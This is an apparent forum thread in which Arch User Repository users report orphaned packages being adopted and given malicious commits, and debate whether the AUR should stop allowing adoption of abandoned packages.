This campaign is still ongoing. I just got an email that one of my old packages (which hasn't worked for years and was orphaned for a while) was adopted and immediately a malicious commit was pushed. They seem to be using bun instead of npm now, so any npm-based workaround likely isn't effective.
https://aur.archlinux.org/cgit/aur.git/commit/?h=toggldeskto...
Same here, just got a notification that one of my watched aur packages got taken over of someone random because it was orphaned.
I'm wondering at this point if the idea of adopting orphaned packages is broken and should be removed.
Inconvenient, but perhaps instead of allowing adoption of someone else's abandoned package, the AUR forces a new submission instead and regularly purges orphaned packages older than a certain age?
Absolutely! Supply chain attacks are always going to be a problem, but just letting someone take over a package because it hasn’t been touched in a while seems like a really poor policy.
If you want to change it, fork it!